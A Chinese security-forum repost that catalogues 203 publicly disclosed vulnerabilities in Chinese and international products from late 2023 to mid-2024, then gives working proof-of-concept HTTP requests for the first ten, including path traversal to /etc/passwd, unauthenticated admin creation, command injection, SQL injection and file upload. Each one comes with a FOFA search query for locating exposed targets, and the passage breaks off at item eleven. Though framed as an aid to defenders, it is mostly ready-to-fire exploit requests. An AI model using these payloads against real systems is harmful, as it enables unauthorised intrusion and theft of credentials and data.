中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-2024066 @7 X+ {% n# z/ e) G
道一安全 2024-06-05 07:41 北京
' R6 D" X* }( K9 z' |3 a以下文章来源于网络安全新视界 ,作者网络安全新视界1 q' K) ^+ V8 }# ~

. A) k1 y6 m5 P8 u9 k; N) {) L发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
' l: o2 d0 H) S" g; T
" `9 X0 I$ ?9 m漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。8 ~; T- w7 Z1 G$ Z- ]& j; D
9 K( o* z2 u9 i$ `/ O
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。/ L1 v% r: Q# r( x
& E5 t: n! j! Q) w* |
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。2 L0 y; D/ F* U% i2 C0 q3 _/ j  b
1 C, m( H0 S# d
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。6 \/ ]7 p* ^% m) p" C
  s/ q0 [7 f1 ^. r6 ~; v2 l: }
7 Q" m5 r) J* B
声明
" }7 I7 v) J6 P* k8 y# q9 G, R( s$ f7 W6 D9 p
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。5 ?5 n: X3 k4 I! m/ l/ @
# a7 w) O' m6 {/ f& R
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。, @5 Y# c: w* g8 U
! ^) c# c8 r$ W- g- q) B" M

' s( ]! m! b+ k  f( c3 T" c1 A; l8 E3 F( h# K, m4 [3 a
目录+ _$ w$ y  I$ Y( |& x$ d" V4 I) Y8 L
2 `# S  K' v1 X) }4 c
01) P/ J% J& x6 i6 o

' i. x" K9 R6 N3 }: z+ _% H1. StarRocks MPP数据库未授权访问* |& u: I# M0 B
2. Casdoor系统static任意文件读取
9 ?5 ~( O, U. W3. EasyCVR智能边缘网关 userlist 信息泄漏5 I" Z6 c$ v7 ?+ T& x4 H
4. EasyCVR视频管理平台存在任意用户添加
9 z* M. g1 q& n5. NUUO NVR 视频存储管理设备远程命令执行
* l3 B, x: D: O. R6. 深信服 NGAF 任意文件读取8 P$ ]) X, `3 K$ M- j8 |; f6 d
7. 鸿运主动安全监控云平台任意文件下载1 v4 n$ s: S* _1 x
8. 斐讯 Phicomm 路由器RCE
# P: }5 i; F( f4 {6 f. w7 z& O: R9. 稻壳CMS keyword 未授权SQL注入  V4 Z8 N0 R; T  o& J' }; }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 W4 \3 T2 m6 _5 B' E- x" P9 Q
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 Y- ^/ m! m3 \3 X
12. Jorani < 1.0.2 远程命令执行! q9 b5 I" K7 A: @9 S" u
13. 红帆iOffice ioFileDown任意文件读取
. g: L) a$ t) J2 P14. 华夏ERP(jshERP)敏感信息泄露
6 O9 `! z* h7 x( h4 n0 }15. 华夏ERP getAllList信息泄露
" c) S' ]7 h5 E) D+ A  F( ~: U! \16. 红帆HFOffice医微云SQL注入4 Z% Q9 ]/ U3 T5 }  T- Y7 p4 l
17. 大华 DSS itcBulletin SQL 注入* m: P3 ^; l+ V; e7 u
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% p$ F4 J: C/ T+ B2 k2 F6 u19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 h; B% v# @" M4 ^20. 大华ICC智能物联综合管理平台任意文件读取
) g3 ?: g) |2 p8 M, W( Y21. 大华ICC智能物联综合管理平台random远程代码执行
1 P( h- G7 S# }& [22. 大华ICC智能物联综合管理平台 log4j远程代码执行+ e2 k, I- r7 s5 c$ a; T
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行( H/ |& Y. p/ B: j! A; h! z. g% r
24. 用友NC 6.5 accept.jsp任意文件上传
5 ]; e1 V& M! ~2 g25. 用友NC registerServlet JNDI 远程代码执行
( l) |! ~) n) j# {2 m/ A26. 用友NC linkVoucher SQL注入
* T& E/ S) h1 Q- T  A- y27. 用友 NC showcontent SQL注入
# x6 _7 C3 a- T4 V/ F7 z: h" X28. 用友NC grouptemplet 任意文件上传
' j/ S. {3 [1 o- U29. 用友NC down/bill SQL注入" x- a  B7 s) p
30. 用友NC importPml SQL注入
7 u  M9 [( z0 H  s1 y2 e- \31. 用友NC runStateServlet SQL注入
8 o5 F3 z+ U. `* Z/ p* u1 s32. 用友NC complainbilldetail SQL注入7 \: @/ U% T* V+ P: F4 h* j1 M
33. 用友NC downTax/download SQL注入
. z. N9 f3 a1 D& H4 T34. 用友NC warningDetailInfo接口SQL注入7 t1 G( Y  f& B, |" Y' |6 J
35. 用友NC-Cloud importhttpscer任意文件上传
1 [- n- _4 |' U. f36. 用友NC-Cloud soapFormat XXE
; {. Q7 |+ H( \* p1 h37. 用友NC-Cloud IUpdateService XXE
) `6 m5 \' k5 o' ^6 k38. 用友U8 Cloud smartweb2.RPC.d XXE* T1 |5 m3 b) E$ K# q) N5 f
39. 用友U8 Cloud RegisterServlet SQL注入
0 t2 j" @' m9 v6 Y! f40. 用友U8-Cloud XChangeServlet XXE
5 B. Y7 P0 |5 X41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. ]/ O1 Y$ N" J: s/ G! v# u/ R; ]42. 用友GRP-U8 SmartUpload01 文件上传
6 b% \" W# N. F43. 用友GRP-U8 userInfoWeb SQL注入致RCE. e  d- K" ~2 p
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: C0 n4 U2 U/ D* P# b45. 用友GRP-U8 ufgovbank XXE' o& @/ P2 G! |: C8 }3 `
46. 用友GRP-U8 sqcxIndex.jsp SQL注入4 X: I3 e( ^7 v& O' a6 W
47. 用友GRP A++Cloud 政府财务云 任意文件读取* W) L8 r0 F1 \
48. 用友U8 CRM swfupload 任意文件上传6 [9 K" H; [3 n6 x
49. 用友U8 CRM系统uploadfile.php接口任意文件上传/ [6 j, h- o; U- `- V7 f
50. QDocs Smart School 6.4.1 filterRecords SQL注入
( h4 P( w& b( z- R4 B6 b! {4 O51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ C+ G8 o# T$ b
52. 泛微E-Office json_common.php sql注入
- Q  A9 p. F( f/ F8 _( n& ]% E53. 迪普 DPTech VPN Service 任意文件上传
9 d+ r0 w4 ?2 b& @% m* U- ]54. 畅捷通T+ getstorewarehousebystore 远程代码执行
9 p) b+ p0 \% G4 j55. 畅捷通T+ getdecallusers信息泄露
& T+ K7 \. _. h  h9 J56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
: p, h6 }- C- s6 s57. 畅捷通T+ keyEdit.aspx SQL注入
' q* [9 {& e7 k: N; q& o6 \. I58. 畅捷通T+ KeyInfoList.aspx sql注入7 F/ y2 L0 ~8 `( A4 E/ S' S
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行& n4 P  S& R1 H3 K$ m6 p3 }  X, d4 P
60. 百卓Smart管理平台 importexport.php SQL注入- ^  X# L' m$ z# W! t
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
# [* X6 c( n0 w$ V% b62. IP-guard WebServer 远程命令执行
4 n4 I5 g+ M$ ?5 m$ b63. IP-guard WebServer任意文件读取5 ]  n! u. K  R( @
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, v; \( g, d- k/ m6 c7 c9 k
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# A: F" W& X; H" }. t  E
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% ?8 q6 c- F# s5 T, t
67. 万户ezOFFICE wpsservlet任意文件上传
! ]6 j. x0 d4 |5 I4 M3 L68. 万户ezOFFICE wf_printnum.jsp SQL注入
& R. r0 ^/ G0 P+ x# V  a& I/ `69. 万户 ezOFFICE contract_gd.jsp SQL注入
& X7 c& ^9 x1 V1 B7 [% D' O  h70. 万户ezEIP success 命令执行0 P3 ^6 `( H, }" I- C0 j
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
0 D$ ?, F" }7 I/ X$ ]72. 致远OA getAjaxDataServlet XXE$ L% a( ?; Y! S- B5 H
73. GeoServer wms远程代码执行
/ j$ e: t( k- h9 g; R1 u74. 致远M3-server 6_1sp1 反序列化RCE' O! i0 p. Q1 L4 X$ O
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
5 L7 B6 X* y6 H4 q76. 新开普掌上校园服务管理平台service.action远程命令执行; ?4 \* s  M5 L2 n- g. L# {
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 s" L! I; n- H2 P; z# L
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传/ w3 \, N% R) G$ |% Z
79. BYTEVALUE 百为流控路由器远程命令执行9 z7 w# V8 s0 d- q5 ^3 O
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 w+ m8 n- L* D" \7 {- j, K1 u8 o
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
$ m7 n% D# H3 @$ c82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 P) K, x9 N. Q' @. ~/ p
83. JeecgBoot testConnection 远程命令执行
; o. X3 O" w' V- I84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 k* E2 H' m, I
85. SysAid On-premise< 23.3.36远程代码执行
, _4 K( j. Q2 ~4 b- P+ K86. 日本tosei自助洗衣机RCE
% C5 ~& f6 H* L. I- O; d/ s87. 安恒明御安全网关aaa_local_web_preview文件上传
% n& y# v  X$ l. ?! F6 `8 L. N# ^: w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
5 o0 q4 Z- k! X5 @89. 致远互联FE协作办公平台editflow_manager存在sql注入% d- F- Z* u( m6 R( \/ R
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行6 R% y# \' J5 `$ V; C
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( p4 l) }! W8 b2 S92. 海康威视运行管理中心session命令执行4 @- D' D" w/ G5 \! `' x5 Q
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. v# ~7 @8 v  G- G1 Y6 X+ Z* e, f94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
# m2 T8 D2 x/ c9 Z: {( e+ b6 j95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
& ^4 _3 }2 s1 `7 ?8 g) U96. Apache OFBiz  18.12.11 groovy 远程代码执行2 e( h# v1 j9 m8 X1 s
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% A/ b' Y/ d! @1 [" c* r+ N( z98. SpiderFlow爬虫平台远程命令执行" [( L0 C3 E; v7 ^8 y
99. Ncast盈可视高清智能录播系统busiFacade RCE- V2 L+ W5 I! f1 W
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 X. G6 n+ W: S101. ivanti policy secure-22.6命令注入
4 |; `: W, F& U1 H, f  @( Y102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行" v, T$ i0 F+ _' F, M7 \6 ]9 _( s% x
103. Ivanti Pulse Connect Secure VPN XXE
$ C: _& [0 |0 V104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: Y$ X5 e, V0 X8 B: B5 O105. SpringBlade v3.2.0 export-user SQL 注入8 x6 \6 a  o1 j  l
106. SpringBlade dict-biz/list SQL 注入
$ S3 s  a& U% n, W& s; D107. SpringBlade tenant/list SQL 注入9 a* f+ I( c, N! S; n1 p9 h( ~
108. D-Tale 3.9.0 SSRF
! Z) G/ [0 [% f- P: Z  @109. Jenkins CLI 任意文件读取1 F4 `1 z$ t) P: }/ W5 s/ L
110. Goanywhere MFT 未授权创建管理员
* W9 z& g% P- L7 i111. WordPress Plugin HTML5 Video Player SQL注入9 v, o: C6 Z  A7 Y5 |' e2 e
112. WordPress Plugin NotificationX SQL 注入
' p/ R% @6 @1 x/ v" t113. WordPress Automatic 插件任意文件下载和SSRF
3 ]0 e' o: X6 T' j$ o114. WordPress MasterStudy LMS插件 SQL注入
( r. Y$ t& n! e115. WordPress Bricks Builder <= 1.9.6 RCE1 R7 r8 J" u. l' J5 N! h- F
116. wordpress js-support-ticket文件上传
- r6 V( E) u- r$ d& d' ^117. WordPress LayerSlider插件SQL注入8 W$ g6 _2 `+ r" o; C- q- E& [
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' }) f) Q* ?3 m4 t
119. 北京百绰智能S20后台sysmanageajax.php sql注入
/ z$ x' B$ E7 ~" k8 I120. 北京百绰智能S40管理平台导入web.php任意文件上传) \! C" w1 i( T' G6 b, S" f
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
9 `. s+ M3 g9 v122. 北京百绰智能s200管理平台/importexport.php sql注入
( p) E6 Q% J* \9 k/ B3 G" C0 A123. Atlassian Confluence 模板注入代码执行6 k/ `% E  b' y
124. 湖南建研工程质量检测系统任意文件上传
" N. a5 L8 h4 N8 z* E4 \- A  j8 k5 O125. ConnectWise ScreenConnect身份验证绕过! R  W- F  |5 \5 G
126. Aiohttp 路径遍历& {, q4 }/ ~  G0 r
127. 广联达Linkworks DataExchange.ashx XXE3 b# B3 W4 o3 \* |5 a
128. Adobe ColdFusion 反序列化$ ^9 D- T! F+ X) B- @- k' A0 N
129. Adobe ColdFusion 任意文件读取- ^! _, L" N& x8 W
130. Laykefu客服系统任意文件上传
$ W! u2 N9 @8 I2 p0 ]4 k+ e131. Mini-Tmall <=20231017 SQL注入
2 N5 B5 O/ L  u6 e, J( h) ?+ p" X* e132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
! Q$ L# X5 b( ?9 J8 g8 S133. H5 云商城 file.php 文件上传
4 Y! G; ^8 \( c- a1 m7 h% g134. 网康NS-ASG应用安全网关index.php sql注入
: N% C4 e3 \4 N' G135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入3 r. o, ~$ |: G$ i; ?; g
136. NextChat cors SSRF
/ P: ?( Y; \6 ~2 T137. 福建科立迅通信指挥调度平台down_file.php sql注入' ^. _$ f( V3 R  K# \5 ^) L
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& l1 A5 Y% ^0 S; Y0 [0 q6 c9 l139. 福建科立讯通信指挥调度平台editemedia.php sql注入; c1 K8 Y8 L3 L- H) J; S: I
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) Y% d, ]* k7 x5 _  y! A141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入$ H+ p! ^4 i6 Q" i9 S  E2 T
142. CMSV6车辆监控平台系统中存在弱密码4 O+ Z6 o  b2 I2 b' m
143. Netis WF2780 v2.1.40144 远程命令执行
2 j5 r* l& j$ v" o& V) }, }( K144. D-Link nas_sharing.cgi 命令注入' ]% A  i1 `$ N' F. D: {
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入9 U; E/ B! E  z1 B" A+ T
146. MajorDoMo thumb.php 未授权远程代码执行7 J! H" |9 z; ?3 Q4 v
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ C2 v, F1 ]. W* O) O" F4 g  Z148. CrushFTP 认证绕过模板注入7 [* h" J1 n, f- R; z' R- V4 `
149. AJ-Report开源数据大屏存在远程命令执行7 J8 v% i: R' Y) t5 F( K
150. AJ-Report 1.4.0 认证绕过与远程代码执行
- W- Z0 E% O0 f151. AJ-Report 1.4.1 pageList sql注入% T4 H% s$ Q0 G
152. Progress Kemp LoadMaster 远程命令执行
$ |5 o& H, _  w' @; }153. gradio任意文件读取" {6 @# w* T& q4 j7 k  Q: t; k/ _  Y
154. 天维尔消防救援作战调度平台 SQL注入
* \( L/ l, V7 _' G( T. I! D5 _155. 六零导航页 file.php 任意文件上传
- c- @# e+ J6 Z, P: L  |6 k# r156. TBK DVR-4104/DVR-4216 操作系统命令注入9 l" t1 u& \! g0 }- A
157. 美特CRM upload.jsp 任意文件上传1 u1 y* W+ h" v3 O
158. Mura-CMS-processAsyncObject存在SQL注入
% b2 \6 Q# O  [* `0 D; B8 g159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传, I7 t! S+ o$ b1 O1 L+ u; H
160. Sonatype Nexus Repository 3目录遍历与文件读取
' r! u9 l1 e5 E6 P2 o* P9 @+ [4 B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传7 _; y; A( I2 Z* R& A6 F$ v
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
. {2 u5 e" G* i163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; {( w) c8 a. e( [5 ~' ~$ O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ G$ q7 B" k1 ^* R* |
165. OrangeHRM 3.3.3 SQL 注入
% y* L9 S8 M; s' ^9 I. F' [- R& c166. 中成科信票务管理平台SeatMapHandler SQL注入. {* ?% e( D9 P$ n% O
167. 精益价值管理系统 DownLoad.aspx任意文件读取; K+ `$ u, L% g% U2 o& K* e; R
168. 宏景EHR OutputCode 任意文件读取
$ D: b1 S; m  t" O3 V169. 宏景EHR downlawbase SQL注入
/ Q) u  G: |: {) E. _170. 宏景EHR DisplayExcelCustomReport 任意文件读取% x/ p1 O4 v) |, Y9 W. {2 M
171. 通天星CMSV6车载定位监控平台 SQL注入
3 i$ H( i' `8 @" q  y3 J172. DT-高清车牌识别摄像机任意文件读取, X7 F- O0 P8 H
173. Check Point 安全网关任意文件读取2 Y! h* _8 q& [; [; f( c
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 X" f. l  J0 b175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 L: X  y. ^9 A  u( G
176. 电信网关配置管理系统 rewrite.php 文件上传
9 k3 `# A: V9 @8 C' I: ?177. H3C路由器敏感信息泄露
& Y- M: d- j4 h  q5 {, |* n: f178. H3C校园网自助服务系统-flexfileupload-任意文件上传4 A, m) h& w( l% @  Y$ b) }
179. 建文工程管理系统存在任意文件读取& g7 Y4 i& z: A9 E1 e$ r1 ]
180. 帮管客 CRM jiliyu SQL注入
2 G; l" ]* w* e% m; N181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
' H; M) E' ^; \182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
" g! g) Y& n- x1 B, L183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入9 I# Y' z/ A) O3 {  F# l3 I4 w* B
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加; @; t& V# m0 k8 \4 f
185. 瑞友天翼应用虚拟化系统SQL注入2 W' K+ f+ C0 {
186. F-logic DataCube3 SQL注入8 S$ V- @9 x0 }6 R9 N; n
187. Mura CMS processAsyncObject SQL注入
" O  r; _  x4 f: G1 W: Q& Q188. 叁体-佳会视频会议 attachment 任意文件读取/ p: z5 Q7 Z5 |- b# ~; ]
189. 蓝网科技临床浏览系统 deleteStudy SQL注入% m2 T9 W' B( t/ W
190. 短视频矩阵营销系统 poihuoqu 任意文件读取& S, O. u3 B3 H/ p
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
. _) J. g2 A2 t* P192. 富通天下外贸ERP UploadEmailAttr 任意文件上传/ Z! Z* _3 w& @  w! {+ u& Q) U2 v$ m
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 h* [( R) o: Q; l
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传6 ^% n; N. k4 F: n. n. B/ v
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行& L* W7 y* `* u8 \. g$ S
196. 河南省风速科技统一认证平台密码重置
0 u; ^% v* \; M/ \0 e, q197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' G! [. M1 Q$ z' |) `9 a198.  阿里云盘 WebDAV 命令注入
8 K4 E+ u& q1 H/ ]+ o. M, f199. cockpit系统assetsmanager_upload接口 文件上传7 K1 i# n* u8 E0 N8 ]9 ^/ f
200. SeaCMS海洋影视管理系统dmku SQL注入
  P# t+ G( W' J2 a/ c201. 方正全媒体新闻采编系统 binary SQL注入" A7 C2 [- x% [2 y
202. 微擎系统 AccountEdit任意文件上传
- T" F; Q8 B  f/ W203. 红海云EHR PtFjk 文件上传( p. _0 X0 i* w" A+ Y
4 U" z/ o* i- ~0 z
POC列表4 ]5 ]3 p3 f8 z
/ i  n. U) j# a' X! Z1 v
02
# k* J8 X& L% ?7 [( Y
( o  m+ k: E$ k' `% m$ `5 [1. StarRocks MPP数据库未授权访问
8 X/ r% ^8 j; P6 EFOFA :title="StarRocks"
5 K$ G2 n1 q0 }7 fGET /mem_tracker HTTP/1.1; B6 m6 x, a1 A' V  V8 s/ c0 j
Host: URL
8 G% l4 _. [& P( |0 l+ [9 {- K5 J
) n. B' Z' L7 v' m, U( O" }
8 ^" l3 A+ z" Z" G& c9 ?1 G+ D2. Casdoor系统static任意文件读取
* e: k9 H5 l; ~FOFA :title="Casdoor"
# n  ]9 h6 h. GGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
; }. `& X' S- oHost: xx.xx.xx.xx:9999
3 n% A( R: e! ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' K7 g2 d+ n3 g# M' g
Connection: close
6 j0 w2 ^! s/ V7 P2 l( dAccept: */*2 ?$ U: T$ i8 p
Accept-Language: en! z4 j( K. s4 S9 Q0 V" f0 `/ F
Accept-Encoding: gzip
" }* p1 n$ W9 |  t3 W5 A4 M8 N) m1 \0 w1 z5 {

, b& X) ?! Q' c( }' P3. EasyCVR智能边缘网关 userlist 信息泄漏4 V! A; k3 a5 S8 E( Z: }
FOFA :title="EasyCVR"+ v# ]' \' f$ U1 @
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
: q; J4 e* L" w; g: q+ D0 jHost: xx.xx.xx.xx2 z  D6 o8 o) q" `- |
" P  s4 p9 {; x2 J! `5 t: W; [

0 u) {. N8 W6 S4. EasyCVR视频管理平台存在任意用户添加- J9 n; q6 T! D7 R5 @
FOFA :title="EasyCVR"
# i7 E5 h1 o7 d; E* o/ @/ ]! z4 j5 Z$ b* k  d# N$ K4 v& V
password更改为自己的密码md5
! D' H2 L! ]" B! C7 MPOST /api/v1/adduser HTTP/1.13 `' A' X9 U# u. F/ w% Y
Host: your-ip
$ {/ j$ ^7 T0 w( cContent-Type: application/x-www-form-urlencoded; charset=UTF-8& p5 ?; ~. q5 i& j/ ^

* I3 V$ ?$ b& Q( e! Y" x$ C( u7 k" Mname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
6 u- I4 _5 Z" f& H: K
( B  O+ K% |2 I& B7 E# u+ D5 R+ i( A, ~3 v6 X; F
5. NUUO NVR 视频存储管理设备远程命令执行
1 Q0 r, L: [, E$ Z# u- r3 QFOFA:title="Network Video Recorder Login"
, a3 A; v0 ]: ^GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1# m; ~, F" R! Z" {) l! I4 G
Host: xx.xx.xx.xx) V; L& x& y/ s- R2 ?8 B: |
6 H) z: W% |2 Z

# |& T7 o  ~! u/ G, B6. 深信服 NGAF 任意文件读取
. |, R' D6 l) ^* i  G8 O' `FOFA:title="SANGFOR | NGAF"  B. d6 b  G" d0 M2 R
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1# X, Q$ j1 \, j  q! G
Host:, ~( C- A: W3 E+ [, y
9 m# J% t" e1 H" y$ ~- c" D2 C
0 ^$ {8 |% A# s1 T- i& y. N
7. 鸿运主动安全监控云平台任意文件下载
, L( b4 h5 c+ [FOFA:body="./open/webApi.html"
: k7 k+ {" G9 N9 f- zGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
4 X* s1 }/ n/ ~. e+ ]& hHost:: g3 D* r; K4 |/ L8 e% W3 B

& q1 x% N3 ~7 i: B* Y0 a' i
2 c$ X6 }) w" _3 T+ l8. 斐讯 Phicomm 路由器RCE5 q, J- y  t. A  O. I
FOFA:icon_hash="-1344736688"
1 o( L- v' e5 e4 }默认账号admin登录后台后,执行操作
8 h6 R/ ~4 L6 ^  j4 C8 R: [POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.11 i* Z; g! B( |6 M* d2 E3 |
Host: x.x.x.x0 A& k3 ]6 L5 y6 ^2 d
Cookie: sysauth=第一步登录获取的cookie
2 Q  j6 V  S" ^" T; cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz; j, c" D! o9 J
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.363 _3 |, y, f9 C0 t' l( O
* u# n7 C- T) A) o
------WebKitFormBoundaryxbgjoytz
5 x3 Y9 N8 Q9 e) ^2 x1 dContent-Disposition: form-data; name="wifiRebootEnablestatus"8 _' U9 C, @/ T6 `1 _' R/ ~# e+ `

5 x" k. K% p  I8 i: }' G4 \%s
! u1 K% Q3 @( N------WebKitFormBoundaryxbgjoytz
5 A: t' a; o' Z3 yContent-Disposition: form-data; name="wifiRebootrange"6 Y) f/ a8 ?/ t8 ~
3 y; x( b* H8 w9 V, w3 O# ?0 e9 @' p
12:00; id;# u: x+ L+ o& n" \4 h
------WebKitFormBoundaryxbgjoytz- n7 z: a4 @* V8 y! t
Content-Disposition: form-data; name="wifiRebootendrange"
; F% h8 ]/ W  t" k$ U5 @4 S9 w, a0 l4 l+ |/ D
%s:
  [; [& J+ s7 p) S0 j5 x5 z5 K& w* i------WebKitFormBoundaryxbgjoytz% \* j' i1 n; ]$ @+ {+ g" O( H
Content-Disposition: form-data; name="cururl2"5 d- H8 e$ }1 L4 m4 P+ ?
9 l) |6 B9 ~- Y0 x- J
: H( ^' f! Q' Z( P: J0 ^
------WebKitFormBoundaryxbgjoytz--  Z  B/ s/ T. Z% V0 l( F- \- I

' \! E. A2 @( y1 O5 t' g$ e! b9 b% H4 ~! _( D+ v
9. 稻壳CMS keyword 未授权SQL注入* m% V0 O- |8 H" Y
FOFA:app="Doccms"$ Y- Q5 ~  _2 Y- Q2 O
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1' v( q) {' |& R
Host: x.x.x.x, _0 B$ R3 l: ]- s

+ I: X( v- t, j4 O$ _& M! b% n5 K( [, y2 Z
payload为下列语句的二次Url编码
; Q3 {1 B0 s5 ]* J9 E& D( X6 V
' W. r- _1 J/ ]2 I1 E1 ?5 D' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
0 f+ Q9 m6 q! [, Y1 J6 C7 @# `' N, c% |9 |  g
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
  E" s" {8 I5 @8 @FOFA:icon_hash="953405444"! O" j8 S' v( C; o' X) a: [

8 Q& @, _' }. G, w, a# a文件上传后响应中包含上传文件的路径
  h& U. q6 T( w6 GPOST /eis/service/api.aspx?action=saveImg HTTP/1.18 x' a) l  s" h# I! t6 e
Host: x.x.x.x:xx
7 f' x  N; }0 D  v, k3 D/ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
2 u2 W: {. ~9 d3 H2 m6 RContent-Length: 197
, L% `2 A8 [: J$ ~" {) y  N0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% v7 y$ }: s; {/ v2 e- E1 z7 ]Accept-Encoding: gzip, deflate
8 u8 m4 r5 f+ K0 o$ t- ZAccept-Language: zh-CN,zh;q=0.94 u9 Z6 H  h; K) Z- f5 R; ^$ u
Connection: close5 l' v0 }" x8 I. L* b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
% B2 m. |3 v' `) T' l9 O- `. N; Y* ]6 B2 ~' v& b  F
------WebKitFormBoundaryxdgaqmqu
; x1 s  d* Z2 C: i9 PContent-Disposition: form-data; name="file"filename="icfitnya.txt"- [: f& ?5 T1 P; n/ D
Content-Type: text/html# Y; a7 Q: O; h4 K3 t& ~, d  \

4 n8 O, r) H0 @7 ]! T: T$ ]" B* Ujmnqjfdsupxgfidopeixbgsxbf& m  T% |4 n, }7 _6 j
------WebKitFormBoundaryxdgaqmqu--2 `! k. N3 f" d5 g: `
. X* K/ I7 B0 G) U( d: Y
7 S4 i2 P, N5 P& M) j
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
